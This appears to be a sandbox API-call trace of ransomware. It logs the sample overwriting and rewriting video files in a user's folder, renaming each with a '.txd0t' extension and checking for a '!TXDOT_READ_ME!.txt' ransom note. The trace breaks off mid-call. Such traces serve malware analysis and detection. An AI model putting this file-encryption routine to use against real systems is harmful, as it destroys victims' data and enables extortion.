CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\w7jo4i_4r ubq7ofin.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0077.007] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=44082) returned 1 [0077.007] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.007] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.008] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff51ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.008] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xac30, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0xac30, lpOverlapped=0x0) returned 1 [0077.009] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff53d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.009] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xac30, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0xac30, lpOverlapped=0x0) returned 1 [0077.009] FlushFileBuffers (hFile=0x460) returned 1 [0077.011] GetProcessHeap () returned 0xe30000 [0077.011] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14a) returned 0xeca148 [0077.011] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" [0077.011] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv") returned="w7jO4I_4r ubq7OFIn.flv" [0077.011] StrCpyW (in: psz1=0xeca1be, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.011] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt") returned 1 [0077.011] GetProcessHeap () returned 0xe30000 [0077.011] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0077.011] CloseHandle (hObject=0x460) returned 1 [0077.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\w7jo4i_4r ubq7ofin.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\w7jo4i_4r ubq7ofin.flv.txd0t")) returned 1 [0077.013] SetEvent (hEvent=0x3f8) returned 1 [0077.013] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.014] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" [0077.015] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t" [0077.015] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t") returned 0 [0077.015] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv", dwFileAttributes=0x80) returned 1 [0077.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\zxaeqboqqwast az98l.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.015] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=34360) returned 1 [0077.015] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.015] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.016] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff77c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.016] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x8630, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x8630, lpOverlapped=0x0) returned 1 [0077.017] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff79d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.017] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x8630, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x8630, lpOverlapped=0x0) returned 1 [0077.017] FlushFileBuffers (hFile=0x474) returned 1 [0077.021] GetProcessHeap () returned 0xe30000 [0077.021] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x132) returned 0xe9b648 [0077.021] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" [0077.021] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv") returned="ZXAEqbOqqWast AZ98L.flv" [0077.021] StrCpyW (in: psz1=0xe9b6a4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.021] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0077.021] GetProcessHeap () returned 0xe30000 [0077.021] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0077.021] CloseHandle (hObject=0x474) returned 1 [0077.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\zxaeqboqqwast az98l.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\zxaeqboqqwast az98l.flv.txd0t")) returned 1 [0077.023] SetEvent (hEvent=0x3f8) returned 1 [0077.023] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.023] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" [0077.024] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t" [0077.024] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t") returned 0 [0077.024] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4", dwFileAttributes=0x80) returned 1 [0077.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\ay37u ht.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.024] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=56651) returned 1 [0077.024] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.024] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.025] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff20b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.025] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xdd40, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xdd40, lpOverlapped=0x0) returned 1 [0077.026] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff22c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.026] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xdd40, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xdd40, lpOverlapped=0x0) returned 1 [0077.026] FlushFileBuffers (hFile=0x474) returned 1 [0077.028] GetProcessHeap () returned 0xe30000 [0077.028] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2328 [0077.028] StrCpyW (in: psz1=0xed2328, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" [0077.028] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4") returned="ay37U hT.mp4" [0077.028] StrCpyW (in: psz1=0xed2376, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.028] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 1 [0077.029] GetProcessHeap () returned 0xe30000 [0077.029] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2328 | out: hHeap=0xe30000) returned 1 [0077.029] CloseHandle (hObject=0x474) returned 1 [0077.031] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\ay37u ht.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\ay37u ht.mp4.txd0t")) returned 1 [0077.031] SetEvent (hEvent=0x3f8) returned 1 [0077.031] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.032] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" [0077.033] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t" [0077.033] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t") returned 0 [0077.033] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf", dwFileAttributes=0x80) returned 1 [0077.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\kxtmh_dciu7sgwmg7i.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.033] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=78947) returned 1 [0077.033] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.033] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.034] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec99d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.034] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x13460, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x13460, lpOverlapped=0x0) returned 1 [0077.037] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffecba0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.037] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x13460, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x13460, lpOverlapped=0x0) returned 1 [0077.037] FlushFileBuffers (hFile=0x474) returned 1 [0077.040] GetProcessHeap () returned 0xe30000 [0077.040] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0077.040] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" [0077.040] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf") returned="kxtmh_DCIU7SgwmG7I.swf" [0077.040] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.040] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 1 [0077.040] GetProcessHeap () returned 0xe30000 [0077.040] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0077.040] CloseHandle (hObject=0x474) returned 1 [0077.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\kxtmh_dciu7sgwmg7i.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\kxtmh_dciu7sgwmg7i.swf.txd0t")) returned 1 [0077.043] SetEvent (hEvent=0x3f8) returned 1 [0077.043] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.045] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" [0077.045] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t" [0077.045] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t") returned 0 [0077.045] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi", dwFileAttributes=0x80) returned 1 [0077.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\oonzmd4unsbslkujo7.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.045] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=34403) returned 1 [0077.046] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.046] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.047] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff779d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.047] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x8660, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x8660, lpOverlapped=0x0) returned 1 [0077.048] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff79a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.048] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x8660, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x8660, lpOverlapped=0x0) returned 1 [0077.048] FlushFileBuffers (hFile=0x474) returned 1 [0077.050] GetProcessHeap () returned 0xe30000 [0077.050] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0077.050] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" [0077.050] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi") returned="OoNzmd4unsBSLKUjo7.avi" [0077.050] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.051] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 1 [0077.051] GetProcessHeap () returned 0xe30000 [0077.051] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0077.051] CloseHandle (hObject=0x474) returned 1 [0077.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\oonzmd4unsbslkujo7.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\oonzmd4unsbslkujo7.avi.txd0t")) returned 1 [0077.053] SetEvent (hEvent=0x3f8) returned 1 [0077.053] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.055] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" [0077.055] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t" [0077.055] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t") returned 0 [0077.055] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv", dwFileAttributes=0x80) returned 1 [0077.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\t8nhex.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.056] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=63019) returned 1 [0077.056] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.056] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.057] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff07d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.057] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf620, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xf620, lpOverlapped=0x0) returned 1 [0077.059] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff09e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.059] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf620, 